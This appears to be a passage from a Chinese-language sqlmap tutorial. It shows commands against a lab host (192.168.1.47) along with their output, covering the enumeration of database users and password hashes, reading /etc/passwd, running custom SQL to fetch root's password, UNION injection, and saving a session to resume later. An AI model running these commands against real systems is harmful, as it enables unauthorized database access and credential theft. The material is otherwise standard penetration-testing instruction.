1 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- 2 current-db 3 4 5 current database: 'testdb' 6 7 8 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users 9 10 11 database management system users [5]: 12 [*] 'debian-sys-maint'@'localhost' 13 [*] 'root'@'127.0.0.1' 14 [*] 'root'@'leboyer' 15 [*] 'root'@'localhost' 16 [*] 'testuser'@'localhost' 17 18 19 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- 20 passwords 21 22 23 database management system users password hashes: 24 [*] debian-sys-maint [1]: 25 password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 26 [*] root [1]: 27 password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY 28 [*] testuser [1]: 29 password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 30 31 32 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs 33 34 35 available databases [3]: 36 [*] information_schema 37 [*] mysql 38 [*] testdb 39 40 41 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables 42 -D "information_schema" 43 44 45 Database: information_schema 46 [16 tables] 47 +---------------------------------------+ 48 | CHARACTER_SETS | 49 | COLLATION_CHARACTER_SET_APPLICABILITY | 50 | COLLATIONS | 51 | COLUMN_PRIVILEGES | 52 | COLUMNS | 53 | KEY_COLUMN_USAGE | 54 | ROUTINES | 55 | SCHEMA_PRIVILEGES | 56 | SCHEMATA | 57 | STATISTICS | 58 | TABLE_CONSTRAINTS | 59 | TABLE_PRIVILEGES | 60 | TABLES | 61 | TRIGGERS | 62 | USER_PRIVILEGES | 63 | VIEWS | 64 +---------------------------------------+ 65 66 67 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -- 68 columns -T "user" -D "mysql" 69 70 71 Database: mysql 72 Table: user 73 [37 columns] 74 +-----------------------+------+ 75 | Column | Type | 76 +-----------------------+------+ 77 | Alter_priv | enum | 78 | Alter_routine_priv | enum | 79 | Create_priv | enum | 80 | Create_routine_priv | enum | 81 | Create_tmp_table_priv | enum | 82 | Create_user_priv | enum | 83 | Create_view_priv | enum | 84 | Delete_priv | enum | 85 | Drop_priv | enum | 86 | Execute_priv | enum | 87 | File_priv | enum | 88 | Grant_priv | enum | 89 | Host | char | 90 | Index_priv | enum | 91 | Insert_priv | enum | 92 | Lock_tables_priv | enum | 93 | max_connections | int | 94 | max_questions | int | 95 | max_updates | int | 96 | max_user_connections | int | 97 | Password | char | 98 | Process_priv | enum | 99 | References_priv | enum | 100 | Reload_priv | enum | 101 | Repl_client_priv | enum | 102 | Repl_slave_priv | enum | 103 | Select_priv | enum | 104 | Show_db_priv | enum | 105 | Show_view_priv | enum | 106 | Shutdown_priv | enum | 107 | ssl_cipher | blob | 108 | ssl_type | enum | 109 | Super_priv | enum | 110 | Update_priv | enum | 111 | User | char | 112 | x509_issuer | blob | 113 | x509_subject | blob | 114 +-----------------------+------+ 115 116 117 13、显示指定的文件内容,一般用于php 118 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file / 119 etc/passwd 120 121 122 /etc/passwd: 123 --- 124 root:x:0:0:root:/root:/bin/bash 125 daemon:x:1:1:daemon:/usr/sbin:/bin/sh 126 bin:x:2:2:bin:/bin:/bin/sh 127 sys:x:3:3:sys:/dev:/bin/sh 128 sync:x:4:65534:sync:/bin:/bin/sync 129 games:x:5:60:games:/usr/games:/bin/sh 130 man:x:6:12:man:/var/cache/man:/bin/sh 131 lp:x:7:7:lp:/var/spool/lpd:/bin/sh 132 mail:x:8:8:mail:/var/mail:/bin/sh 133 news:x:9:9:news:/var/spool/news:/bin/sh 134 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 135 proxy:x:13:13:proxy:/bin:/bin/sh 136 www-data:x:33:33:www-data:/var/www:/bin/false 137 backup:x:34:34:backup:/var/backups:/bin/sh 138 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 139 mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false 140 postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/ 141 bin/bash 142 inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash 143 --- 144 145 146 14、执行你自己的sql语句。 147 148 149 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e 150 "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" 151 152 153 [hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM 154 mysql.user WHERE user = 'root' LIMIT 0, 1' 155 [hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 156 'root' LIMIT 0, 1 157 [hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY 158 [hh:mm:19] [INFO] performed 118 queries in 0 seconds 159 SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 160 'YYYYYYYYYYYYYYYY' 161 162 163 15、union注入 164 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union- 165 check 166 167 168 valid union: 'http://192.168.1.47/page.php?id=1UNION ALL SELECT 169 NULL, NULL, NULL--&cat=2' 170 171 172 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- 173 union-use --banner 174 175 176 [...] 177 [hh:mm:24] [INFO] testing inband sql injection on parameter 'id' 178 [hh:mm:24] [INFO] the target url could be affected by an inband sql 179 injection vulnerability 180 [hh:mm:24] [INFO] confirming inband sql injection on parameter 'id' 181 [...] 182 [hh:mm:24] [INFO] fetching banner 183 [hh:mm:24] [INFO] request:http://192.168.1.47/page.php?id=1UNION ALL 184 SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), 185 CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2 186 [hh:mm:24] [INFO] performed 1 queries in 0 seconds 187 banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 188 189 190 16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。 191 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b - 192 o "sqlmap.log" 193 194 195 [...] 196 [hh:mm:09] [INFO] fetching banner 197 [hh:mm:09] [INFO] query: VERSION() 198 [hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log 199 [hh:mm:11] [INFO] performed 139 queries in 1 seconds 200 banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 201 202 203 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- 204 banner -o "sqlmap.log" --resume 205 206 207 [...] 208 [hh:mm:13] [INFO] fetching banner 209 [hh:mm:13] [INFO] query: VERSION() 210 [hh:mm:13] [INFO] retrieved the length of query: 26 211 [hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb 212 [hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log 213 banner:
与您一同分享精彩的网络世界
-486174组织成员
浙公网安备 33010602011771号